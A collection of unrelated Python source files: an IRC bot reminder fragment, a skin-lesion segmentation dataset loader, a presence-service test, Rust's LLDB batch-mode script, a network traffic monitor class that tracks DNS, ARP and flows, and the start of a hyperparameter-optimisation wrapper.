tzi = timezone(tz)
good_tz = True
if not good_tz:
bot.reply("I don't know that timezone or user.")
return NOLIMIT
else:
tzi = timezone(tz)
elif bot.db and trigger.nick in bot.db.preferences:
tz = bot.db.preferences.get(trigger.nick, 'tz')
if tz:
tzi = timezone(tz)
else:
tzi = timezone('UTC')
else:
tzi = timezone('UTC')
now = datetime.now(tzi)
timediff = (datetime(now.year, now.month, now.day, int(hour), int(minute),
int(second), tzinfo=now.tzinfo)
- now)
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, timezone('UTC'))
def create_reminder(bot, trigger, duration, message, tz):
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
tformat = "%F - %T%Z"
if bot.db and trigger.nick in bot.db.preferences:
tformat = (bot.db.preferences.get(trigger.nick, 'time_format')
or "%F - %T%Z")
timef = datetime.fromtimestamp(t, tz).strftime(tformat)
bot.reply('Okay, will remind at %s' % timef)
else:
bot.reply('Okay, will remind in %s secs' % duration)
|
ISICDataset.py
|
# ----------------------------------------
# Written by Xiaoqing GUO
# ----------------------------------------
from __future__ import print_function, division
import os
import torch
import pandas as pd
import cv2
import multiprocessing
from skimage import io
from PIL import Image
import numpy as np
from torch.utils.data import Dataset
from datasets.transform import *
class ISICDataset(Dataset):
def __init__(self, dataset_name, cfg, period, aug=False):
self.dataset_name = dataset_name
self.root_dir = os.path.join(cfg.ROOT_DIR,'data')
self.dataset_dir = os.path.join(self.root_dir,dataset_name)
self.rst_dir = os.path.join(self.root_dir,'results',dataset_name,'Segmentation')
self.eval_dir = os.path.join(self.root_dir,'eval_result',dataset_name,'Segmentation')
self.period = period
self.img_dir = os.path.join(self.dataset_dir, 'images')
self.ann_dir = os.path.join(self.dataset_dir, 'annotations')
self.seg_dir = os.path.join(self.dataset_dir, 'annotations')
self.set_dir = os.path.join(self.root_dir, dataset_name)
file_name = None
if aug:
file_name = self.set_dir+'/'+period+'aug.txt'
else:
file_name = self.set_dir+'/'+period+'.txt'
df = pd.read_csv(file_name, names=['filename'])
self.name_list = df['filename'].values
self.rescale = None
self.centerlize = None
self.randomcrop = None
self.randomflip = None
self.randomrotation = None
self.randomscale = None
self.randomhsv = None
self.multiscale = None
self.totensor = ToTensor()
self.cfg = cfg
if dataset_name == 'ISIC2017':
self.categories = ['melanoma']
self.coco2voc = [[0],
[5],
[2],
[16],
[9],
[44],#,46,86],
[6],
[3],#,8],
[17],
[62],
[21],
[67],
[18],
[19],#,24],
[4],
[1],
[64],
[20],
[63],
[7],
[72]]
self.num_categories = len(self.categories)
assert(self.num_categories+1 == self.cfg.MODEL_NUM_CLASSES)
self.cmap = self.__colormap(len(self.categories)+1)
if cfg.DATA_RESCALE > 0:
self.rescale = Rescale(cfg.DATA_RESCALE,fix=False)
self.centerlize = Centerlize(cfg.DATA_RESCALE)
if 'train' in self.period:
if cfg.DATA_RANDOMCROP > 0:
self.randomcrop = RandomCrop(cfg.DATA_RANDOMCROP)
if cfg.DATA_RANDOMROTATION > 0:
self.randomrotation = RandomRotation(cfg.DATA_RANDOMROTATION)
if cfg.DATA_RANDOMSCALE != 1:
self.randomscale = RandomScale(cfg.DATA_RANDOMSCALE)
if cfg.DATA_RANDOMFLIP > 0:
self.randomflip = RandomFlip(cfg.DATA_RANDOMFLIP)
if cfg.DATA_RANDOM_H > 0 or cfg.DATA_RANDOM_S > 0 or cfg.DATA_RANDOM_V > 0:
self.randomhsv = RandomHSV(cfg.DATA_RANDOM_H, cfg.DATA_RANDOM_S, cfg.DATA_RANDOM_V)
else:
self.multiscale = Multiscale(self.cfg.TEST_MULTISCALE)
def __len__(self):
return len(self.name_list)
def __getitem__(self, idx):
name = self.name_list[idx].split()[0]
img_file = self.img_dir + '/' + name
image = cv2.imread(img_file)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# image = np.array(io.imread(img_file),dtype=np.uint8)
r,c,_ = image.shape
sample = {'image': image, 'name': name, 'row': r, 'col': c}
if 'train' in self.period:
seg_file = self.seg_dir + '/' + self.name_list[idx].split()[1]
segmentation = np.array(Image.open(seg_file))
#(T, segmentation) = cv2.threshold(segmentation, 0, 255, cv2.THRESH_BINARY)
sample['segmentation'] = segmentation/255.
if self.cfg.DATA_RANDOM_H>0 or self.cfg.DATA_RANDOM_S>0 or self.cfg.DATA_RANDOM_V>0:
sample = self.randomhsv(sample)
if self.cfg.DATA_RANDOMFLIP > 0:
sample = self.randomflip(sample)
if self.cfg.DATA_RANDOMROTATION > 0:
sample = self.randomrotation(sample)
if self.cfg.DATA_RANDOMSCALE != 1:
sample = self.randomscale(sample)
if self.cfg.DATA_RANDOMCROP > 0:
sample = self.randomcrop(sample)
if self.cfg.DATA_RESCALE > 0:
#sample = self.centerlize(sample)
sample = self.rescale(sample)
else:
seg_file = self.seg_dir + '/' + self.name_list[idx].split()[1]
segmentation = np.array(Image.open(seg_file))
#(T, segmentation) = cv2.threshold(segmentation, 0, 255, cv2.THRESH_BINARY)
sample['segmentation'] = segmentation/255.
if self.cfg.DATA_RESCALE > 0:
sample = self.rescale(sample)
sample = self.multiscale(sample)
if 'segmentation' in sample.keys():
sample['mask'] = sample['segmentation'] < self.cfg.MODEL_NUM_CLASSES
#print(sample['segmentation'].max(),sample['segmentation'].shape)
t = sample['segmentation']
t[t >= self.cfg.MODEL_NUM_CLASSES] = 0
#print(t.max(),t.shape)
#print(onehot(np.int32(t),self.cfg.MODEL_NUM_CLASSES))
sample['segmentation_onehot']=onehot(np.int32(t),self.cfg.MODEL_NUM_CLASSES)
sample = self.totensor(sample)
return sample
def __colormap(self, N):
"""Get the map from label index to color
Args:
N: number of class
return: a Nx3 matrix
"""
cmap = np.zeros((N, 3), dtype = np.uint8)
def uint82bin(n, count=8):
"""returns the binary of integer n, count refers to amount of bits"""
return ''.join([str((n >> y) & 1) for y in range(count-1, -1, -1)])
for i in range(N):
r = 0
g = 0
b = 0
idx = i
for j in range(7):
str_id = uint82bin(idx)
r = r ^ ( np.uint8(str_id[-1]) << (7-j))
g = g ^ ( np.uint8(str_id[-2]) << (7-j))
b = b ^ ( np.uint8(str_id[-3]) << (7-j))
idx = idx >> 3
cmap[i, 0] = r
cmap[i, 1] = g
cmap[i, 2] = b
return cmap
def label2colormap(self, label):
m = label.astype(np.uint8)
r,c = m.shape
cmap = np.zeros((r,c,3), dtype=np.uint8)
cmap[:,:,0] = (m&1)<<7 | (m&8)<<3
cmap[:,:,1] = (m&2)<<6 | (m&16)<<2
cmap[:,:,2] = (m&4)<<5
return cmap
def save_result(self, result_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in result_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
# predict_color = self.label2colormap(sample['predict'])
# p = self.__coco2voc(sample['predict'])
cv2.imwrite(file_path, sample['predict'])
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def save_result_train(self, result_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in result_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
img_file = self.img_dir + '/' + sample['name']
input_img = cv2.imread(img_file)
input_img = cv2.resize(input_img, (sample['predict'].shape[0],sample['predict'].shape[1]))
pred_img = np.stack([sample['predict'], sample['predict'], sample['predict']]).transpose((1,2,0))
lab_img = np.stack([sample['label'], sample['label'], sample['label']]).transpose((1,2,0))
img=np.zeros([input_img.shape[0], input_img.shape[1]*3, input_img.shape[2]])
img[:,:input_img.shape[1], :] = input_img
img[:,input_img.shape[1]:input_img.shape[1]*2, :] = pred_img
img[:,input_img.shape[1]*2:, :] = lab_img
cv2.imwrite(file_path, img)
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def save_result_train_thres(self, result_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in result_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
img_file = self.img_dir + '/' + sample['name']
input_img = cv2.imread(img_file)
input_img = cv2.resize(input_img, (sample['predict'].shape[0],sample['predict'].shape[1]))
pred_img = np.stack([sample['predict'], sample['predict'], sample['predict']]).transpose((1,2,0))
lab_img = np.stack([sample['label'], sample['label'], sample['label']]).transpose((1,2,0))
thres_img = np.stack([sample['threshold'], sample['threshold'], sample['threshold']]).transpose((1,2,0))
img=np.zeros([input_img.shape[0], input_img.shape[1]*4, input_img.shape[2]])
img[:,:input_img.shape[1], :] = input_img
img[:,input_img.shape[1]:input_img.shape[1]*2, :] = thres_img
img[:,input_img.shape[1]*2:input_img.shape[1]*3, :] = pred_img
img[:,input_img.shape[1]*3:, :] = lab_img
cv2.imwrite(file_path, img)
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def save_result_train_mixup(self, dataset_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_mixup_lambda'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in dataset_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
inputs_batched = sample['inputs_batched'].transpose((1,2,0))
mixup_inputs_batched = sample['mixup_inputs_batched'].transpose((1,2,0))
mixup_input = sample['mixup_input'].transpose((1,2,0))
inputs_labels = np.stack([sample['inputs_labels'], sample['inputs_labels'], sample['inputs_labels']]).transpose((1,2,0))
mixup_labels_batched = np.stack([sample['mixup_labels_batched'], sample['mixup_labels_batched'], sample['mixup_labels_batched']]).transpose((1,2,0))
mixup_label = np.stack([sample['mixup_label'], sample['mixup_label'], sample['mixup_label']]).transpose((1,2,0))
cosSimi1 = np.stack([sample['cosSimi1'], sample['cosSimi1'], sample['cosSimi1']]).transpose((1,2,0))
cosSimi2 = np.stack([sample['cosSimi2'], sample['cosSimi2'], sample['cosSimi2']]).transpose((1,2,0))
img=np.zeros([inputs_batched.shape[0]*3, inputs_batched.shape[1]*3, inputs_batched.shape[2]])
img[:inputs_batched.shape[0],:inputs_batched.shape[1], :] = inputs_batched
img[:inputs_batched.shape[0],inputs_batched.shape[1]:inputs_batched.shape[1]*2, :] = mixup_inputs_batched
img[:inputs_batched.shape[0],inputs_batched.shape[1]*2:inputs_batched.shape[1]*3, :] = mixup_input
img[inputs_batched.shape[0]:inputs_batched.shape[0]*2,:inputs_batched.shape[1], :] = inputs_labels
img[inputs_batched.shape[0]:inputs_batched.shape[0]*2,inputs_batched.shape[1]*1:inputs_batched.shape[1]*2, :] = mixup_labels_batched
img[inputs_batched.shape[0]:inputs_batched.shape[0]*2,inputs_batched.shape[1]*2:inputs_batched.shape[1]*3, :] = mixup_label
img[inputs_batched.shape[0]*2:,:inputs_batched.shape[1], :] = cosSimi1
img[inputs_batched.shape[0]*2:,inputs_batched.shape[1]*1:inputs_batched.shape[1]*2, :] = cosSimi2
img_RGB=np.zeros([inputs_batched.shape[0]*3, inputs_batched.shape[1]*3, inputs_batched.shape[2]])
img_RGB[:,:,0] = img[:,:,2]
img_RGB[:,:,1] = img[:,:,1]
img_RGB[:,:,2] = img[:,:,0]
cv2.imwrite(file_path, img_RGB)
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def do_matlab_eval(self, model_id):
import subprocess
path = os.path.join(self.root_dir, 'VOCcode')
eval_filename = os.path.join(self.eval_dir,'%s_result.mat'%model_id)
cmd = 'cd {} && '.format(path)
cmd += 'matlab -nodisplay -nodesktop '
cmd += '-r "dbstop if error; VOCinit; '
cmd += 'VOCevalseg(VOCopts,\'{:s}\');'.format(model_id)
cmd += 'accuracies,avacc,conf,rawcounts = VOCevalseg(VOCopts,\'{:s}\'); '.format(model_id)
cmd += 'save(\'{:s}\',\'accuracies\',\'avacc\',\'conf\',\'rawcounts\'); '.format(eval_filename)
cmd += 'quit;"'
print('start subprocess for matlab evaluation...')
print(cmd)
subprocess.call(cmd, shell=True)
def do_python_eval(self, model_id):
predict_folder = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
gt_folder = self.seg_dir
TP = []
P = []
T = []
for i in range(self.cfg.MODEL_NUM_CLASSES):
TP.append(multiprocessing.Value('i', 0, lock=True))
P.append(multiprocessing.Value('i', 0, lock=True))
T.append(multiprocessing.Value('i', 0, lock=True))
'''def compare(start,step,TP,P,T):
for idx in range(start,len(self.name_list),step):
print('%d/%d'%(idx,len(self.name_list)))
name_image = self.name_list[idx].split()[0]
name_seg = self.name_list[idx].split()[1]
predict_file = os.path.join(predict_folder,'%s'%name_image)
gt_file = os.path.join(gt_folder,'%s'%name_seg)
predict = np.array(Image.open(predict_file)) #cv2.imread(predict_file)
gt = np.array(Image.open(gt_file))
(_, predict) = cv2.threshold(predict, 0, 255, cv2.THRESH_BINARY)
#print(np.unique(predict), np.unique(gt))
predict = np.int32(predict/255.)
gt = np.int32(gt/255.)
cal = gt<255
mask = (predict==gt) * cal
for i in range(self.cfg.MODEL_NUM_CLASSES):
P[i].acquire()
P[i].value += np.sum((predict==i)*cal)
P[i].release()
T[i].acquire()
T[i].value += np.sum((gt==i)*cal)
T[i].release()
TP[i].acquire()
TP[i].value += np.sum((gt==i)*mask)
TP[i].release()
p_list = []
for i in range(15):
p = multiprocessing.Process(target=compare, args=(i,15,TP,P,T))
p.start()
p_list.append(p)
for p in p_list:
p.join()
IoU = []
for i in range(self.cfg.MODEL_NUM_CLASSES):
print(TP[i].value, T[i].value, P[i].value)
IoU.append(TP[i].value/(T[i].value+P[i].value-TP[i].value+1e-10))
for i in range(self.cfg.MODEL_NUM_CLASSES):
if i == 0:
print('%11s:%7.3f%%'%('backbound',IoU[i]*100),end='\t')
else:
if i%2 != 1:
print('%11s:%7.3f%%'%(self.categories[i-1],IoU[i]*100),end='\t')
else:
print('%11s:%7.3f%%'%(self.categories[i-1],IoU[i]*100))
miou = np.mean(np.array(IoU))
print('\n======================================================')
print('%11s:%7.3f%%'%('mIoU',miou*100)) '''
def do_python_eval(self, model_id):
IoU_array = 0.
sample_num = 0.
predict_folder = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
gt_folder = self.seg_dir
TP = np.zeros((self.cfg.MODEL_NUM_CLASSES), np.uint64)
P = np.zeros((self.cfg.MODEL_NUM_CLASSES), np.uint64)
T = np.zeros((self.cfg.MODEL_NUM_CLASSES), np.uint64)
for idx in range(len(self.name_list)):
# print('%d/%d'%(idx,len(self.name_list)))
name_image = self.name_list[idx].split()[0]
name_seg = self.name_list[idx].split()[1]
predict_file = os.path.join(predict_folder,'%s'%name_image)
gt_file = os.path.join(gt_folder,'%s'%name_seg)
predict = np.array(Image.open(predict_file)) #cv2.imread(predict_file)
gt = np.array(Image.open(gt_file))
(_, predict) = cv2.threshold(predict, 0, 255, cv2.THRESH_BINARY)
predict = np.int32(predict/255.)
gt = np.int32(gt/255.)
cal = gt<255
mask = (predict==gt) * cal
#print(np.unique(predict), np.unique(gt), np.unique(cal), np.unique(mask))
for i in range(self.cfg.MODEL_NUM_CLASSES):
P[i] = np.sum((predict==i))
T[i] = np.sum((gt==i))
TP[i] = np.sum((gt==i)*mask)
TP = TP.astype(np.float64)
T = T.astype(np.float64)
P = P.astype(np.float64)
IoU = TP/(T+P-TP)
IoU_array += IoU
sample_num += 1
for i in range(self.cfg.MODEL_NUM_CLASSES):
if i == 0:
print('%15s:%7.3f%%'%('background',IoU_array[i]*100/sample_num))
else:
print('%15s:%7.3f%%'%(self.categories[i-1],IoU_array[i]*100/sample_num))
miou = np.mean(IoU_array/sample_num)
print('==================================')
print('%15s:%7.3f%%'%('mIoU',miou*100))
def __coco2voc(self, m):
r,c = m.shape
result = np.zeros((r,c),dtype=np.uint8)
for i in range(0,21):
for j in self.coco2voc[i]:
result[m==j] = i
return result
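# --- hedged usage sketch (not part of the original file) ---
# `cfg` is an external config object; the attribute names below are taken from the code
# above (ROOT_DIR, DATA_RESCALE, DATA_RANDOM*, MODEL_NUM_CLASSES, TEST_MULTISCALE, ...).
# dataset = ISICDataset('ISIC2017', cfg, period='train', aug=False)
# loader = torch.utils.data.DataLoader(dataset, batch_size=8, shuffle=True)
# sample = dataset[0]   # dict with 'image', 'segmentation', 'segmentation_onehot', 'mask', ...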
|
test_presence.py
|
"""Test the presence service."""
import time
from multiprocessing import Process
import pytest
from fm_server.presence import presence_service
@pytest.mark.usefixtures("database_base_seed")
def test_presence_start():
"""Test that the presence service starts."""
presence_controller = Process(target=presence_service)
presence_controller.start()
time.sleep(1)
presence_controller.terminate()
presence_controller.join()
# exitcode is the negative of the signal used to terminate
# the process. 15 is SIGTERM
assert presence_controller.exitcode == -15
|
lldb_batchmode.py
|
# Copyright 2014 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# This script makes it possible to use LLDB in a way similar to GDB's batch mode. That is, given a
# text file containing LLDB commands (one command per line), this script will execute the commands
# one after the other.
# LLDB also has the -s and -S command-line options which also execute a list of commands from a text
# file. However, these commands are executed `immediately`: a command following a `run` or `continue`
# command will be executed immediately after the `run` or `continue`, without waiting for the next
# breakpoint to be hit. Thus a command sequence like the following will not yield reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running and will
# thus fail. Using this Python script, the above will work as expected.
from __future__ import print_function
try:
import _thread as thread # Python 3
except ImportError:
import thread # Python 2
import lldb
import os
import re
import sys
import threading
import time
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
"""Print something if DEBUG_OUTPUT is True"""
global DEBUG_OUTPUT
if DEBUG_OUTPUT:
print("DEBUG: " + str(s))
def normalize_whitespace(s):
"""Replace newlines, tabs, multiple spaces, etc with exactly one space"""
return re.sub("\s+", " ", s)
def breakpoint_callback(frame, bp_loc, dict):
"""This callback is registered with every breakpoint and makes sure that the
frame containing the breakpoint location is selected"""
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"""Executes a single CLI command"""
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
output = res.GetOutput() or ''
print(normalize_whitespace(output), end='\n')
# If the command introduced any breakpoints, make sure to register
        # them with the breakpoint callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." %
str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = ("breakpoint command add -F breakpoint_callback " +
str(breakpoint_id))
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " +
str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " +
str(breakpoint_id))
else:
print(res.GetError())
def start_breakpoint_listener(target):
"""Listens for breakpoints being added and adds new ones to the callback
registration list"""
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target=listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
"""Starts a watchdog thread that will terminate the process after a certain
period of time"""
try:
from time import clock
except ImportError:
from time import perf_counter as clock
watchdog_start_time = clock()
watchdog_max_time = watchdog_start_time + 30
def watchdog():
while clock() < watchdog_max_time:
time.sleep(1)
print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
thread.interrupt_main()
# Start the listener and let it run as a daemon
watchdog_thread = threading.Thread(target=watchdog)
watchdog_thread.daemon = True
watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " +
str(target_error) + ". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
try:
script_file = open(script_path, 'r')
for line in script_file:
command = line.strip()
if command == "run" or command == "r" or re.match("^process\s+launch.*", command):
# Before starting to run the program, let the thread sleep a bit, so all
# breakpoint added events can be processed
time.sleep(0.5)
if command != '':
execute_command(command_interpreter, command)
except IOError as e:
print("Could not read debugging script '%s'." % script_path, file=sys.stderr)
print(e, file=sys.stderr)
print("Aborting.", file=sys.stderr)
sys.exit(1)
finally:
debugger.Terminate()
script_file.close()
|
TrafficMonitor.py
|
import threading
import logging
import time
import datetime
from src.utils.utils import merge_dict, FlowKey, FlowPkt
from src.Classifier import DomainClassifier
from src.utils.utils import get_mac, get_device_name, get_vendor_from_mac, disable_if_offline, IP_is_private
from src.utils.utils import StopProgramException, restart_on_error
class TrafficMonitor:
"""
This class implements the traffic monitor
It receives data from the packet parser and keeps track of traffic features by updating its local data
"""
def __init__(self, host_state, update_delay):
self.host_state = host_state
self.updater_thread = threading.Thread(target=self.safe_updater)
self.updater_thread.daemon = True
self.lock = threading.Lock()
self.active = True
self.update_delay = update_delay
self.device_names = {} # MAC -> name
self.queried_domains = {}
self.blocked_domains = set()
self.passive_DNS = {}
self.arp_table = {}
self.flows = {}
self.domain_scores = {}
self.classifier = None
self.last_timestamp = 0
self.first_timestamp = 0
        self.new_data = False  # set to True whenever new data arrives from the packet parser
self.STOP_AFTER_WITH_NO_INFO = self.host_state.config.get_config("STOP_AFTER_WITH_NO_INFO")
def start(self):
if self.classifier is None:
logging.info("[TrafficMonitor] Initialising classifier")
self.classifier = DomainClassifier()
with self.lock:
self.active = True
logging.info("[Monitor] Traffic monitor starting")
self.updater_thread.start()
def stop(self):
self.active = False
if self.host_state.online:
self.classifier.delete_file()
self.updater_thread.join()
logging.info("[Monitor] Traffic monitor stopping")
def new_device_get_mac(self, ip, mac=""):
# obtain mac of IP
if ip not in self.arp_table:
if mac == "":
if self.host_state.online:
mac = get_mac(ip)
if mac is None or mac == "":
# return and do not add this empty mac to the ARP table
return ""
logging.info("[Monitor] New device: IP=%s, MAC=%s", ip, mac)
self.arp_table[ip] = mac
else:
mac = self.arp_table[ip]
return mac
def new_device_get_name(self, ip, mac):
#obtain device name
if mac != "" and mac not in self.device_names:
if self.host_state.online:
name = get_device_name(ip, self.host_state.gateway_ip)
else:
name = "-"
manufacturer = get_vendor_from_mac(mac)
self.device_names[mac] = (name, manufacturer)
# active discovery function, so disabled when offline
def new_device(self, ip, mac=""):
"""Gathers info and adds the device to ARP table and device names"""
if IP_is_private(ip) and ip != "0.0.0.0":
mac = self.new_device_get_mac(ip, mac)
self.new_device_get_name(ip, mac)
self.new_data = True
if not self.host_state.online:
self.host_state.add_to_victim_list(ip)
def sleep(self, seconds):
"""Sleep for given seconds, but check if still active every second"""
for _ in range(seconds):
if not self.active:
break
time.sleep(1)
def updater(self):
while self.active:
if self.new_data:
for ip in self.arp_table.copy():
self.new_device(ip)
with self.host_state.lock:
# update passive DNS: for each domain add the new IPs (the IP list is a set)
for domain in self.passive_DNS:
self.host_state.passive_DNS.setdefault(domain, set()).update(self.passive_DNS[domain])
# update queried domains
# do not use copy(), simply add the new data
for ip in self.queried_domains.copy():
if ip not in self.host_state.queried_domains:
self.host_state.queried_domains[ip] = []
new_tuples = []
for t in reversed(self.queried_domains[ip]):
if t not in self.host_state.queried_domains[ip]:
new_tuples.append(t)
else:
break
# reverse data to keep chronological order in queried domains
new_data = new_tuples[::-1]
self.host_state.queried_domains[ip] += new_data
# update ARP table
new_ARP = merge_dict(self.host_state.arp_table, self.arp_table)
self.host_state.arp_table = new_ARP.copy()
#update device names
self.host_state.device_names = self.device_names.copy()
#update the list of blocked domains
self.host_state.blocked_domains.update(self.blocked_domains)
# update the list of flows
for flow_key in self.flows.copy():
if flow_key not in self.host_state.flows:
self.host_state.flows[flow_key] = []
self.host_state.flows[flow_key] += self.flows[flow_key]
self.flows = {}
self.host_state.domain_scores = self.domain_scores
self.host_state.last_update = time.time()
self.host_state.last_timestamp = self.last_timestamp
self.new_data = False
last_t = datetime.datetime.fromtimestamp(self.host_state.last_timestamp).strftime('%H:%M:%S')
logging.info("[Monitor] Updated data to host thread, last-t: %s", last_t)
# end of lock
# wait until next iteration,
# split waiting time into small waits to check if process is still active
else:
logging.debug("[Monitor] No new data (source: %s)", self.host_state.capture_file.split("/")[-1])
if not self.host_state.online and time.time() - self.host_state.last_update > self.STOP_AFTER_WITH_NO_INFO:
print("[TrafficMonitor] ===== Stopping because no data has been received since {}s".format(self.STOP_AFTER_WITH_NO_INFO))
self.host_state.active = False
self.sleep(self.update_delay)
def safe_updater(self):
restart_on_error(self.updater)
def score_domain(self, domain):
X = self.classifier.compute_features(domain)
# score is computed from proba of being malicious (ie class = 1)
score = 10 * self.classifier.classifier.predict_proba(X)[0][1]
return score
def add_to_pDNS(self, domain_name, ip_list):
"""Called by the packet_parser when a new domain appears in a DNS response
Adds the domain to the pDNS database (note that the responses may be spoofed, so some IPs will not be contacted)
"""
# add to pDNS database
if domain_name not in self.passive_DNS:
self.passive_DNS[domain_name] = set(ip_list)
# new domain: compute its score
score = self.score_domain(domain_name)
self.domain_scores[domain_name] = round(score,2)
else:
self.passive_DNS[domain_name].update(ip_list)
self.new_data = True
def add_to_queried_domains(self, ip, fqdn, timestamp):
self.queried_domains.setdefault(ip, []).append((timestamp, fqdn))
self.last_timestamp = timestamp
self.new_data = True
def add_to_blocked_domains(self, domain_name):
"""adds a domain to the list of domains that have been spoofed"""
if domain_name not in self.blocked_domains:
self.blocked_domains.add(domain_name)
self.new_data = True
def add_to_ARP_table(self, ip, mac):
"""adds an entry to the ARP table of the host state"""
if ip != "0.0.0.0":
self.arp_table[ip] = mac
self.new_device_get_name(ip, mac)
self.new_data = True
def add_to_flow(self, flow_key:FlowKey, pkt_att:FlowPkt):
"""Adds an entry to flow based on information received from the packet parser"""
self.flows.setdefault(flow_key, []).append(pkt_att)
self.last_timestamp = pkt_att.timestamp
d = datetime.datetime.fromtimestamp(self.last_timestamp)
logging.info("Added to flow, packet at %s", d.strftime("%H:%M:%S"))
self.new_data = True
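# --- hedged usage sketch (not part of the original file) ---
# `host_state` is an application-specific object (config, lock, online flag, ...), so the
# lines below only illustrate the intended call pattern.
# monitor = TrafficMonitor(host_state, update_delay=5)
# monitor.start()                                            # spawns the updater thread
# monitor.add_to_pDNS("example.com", ["93.184.216.34"])      # called by the packet parser
# monitor.add_to_queried_domains("192.168.1.10", "example.com", time.time())
# monitor.stop()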
|
ext_openbox_mfes.py
|
import time
import numpy as np
from ext_algs.base import Ext_opt
from xbbo.core.trials import Trial, Trials
import ConfigSpace
from ConfigSpace import Configuration
from xbbo.utils.constants import Key
import sys
from multiprocessing import Process
sys.path.append('../open-box')
from openbox.apps.multi_fidelity.mq_mfes import mqMFES
from openbox.apps.multi_fidelity.mq_mf_worker import mqmfWorker
# logging.basicConfig(level=logging.ERROR)
class Float(float):
regret_test = None
class HB_opt(Ext_opt):
def __init__(self,
cs: ConfigSpace,
objective_function=None,
budget_bound=[0, np.inf],
seed=0,
**kwargs) -> None:
super().__init__(cs,
objective_function,
budget_bound=budget_bound,
seed=seed)
np.random.seed(self.seed)
self.port = kwargs.get("port", 13577)
self.cs = cs
self.trials = Trials(cs,len(cs.get_hyperparameter_names()))
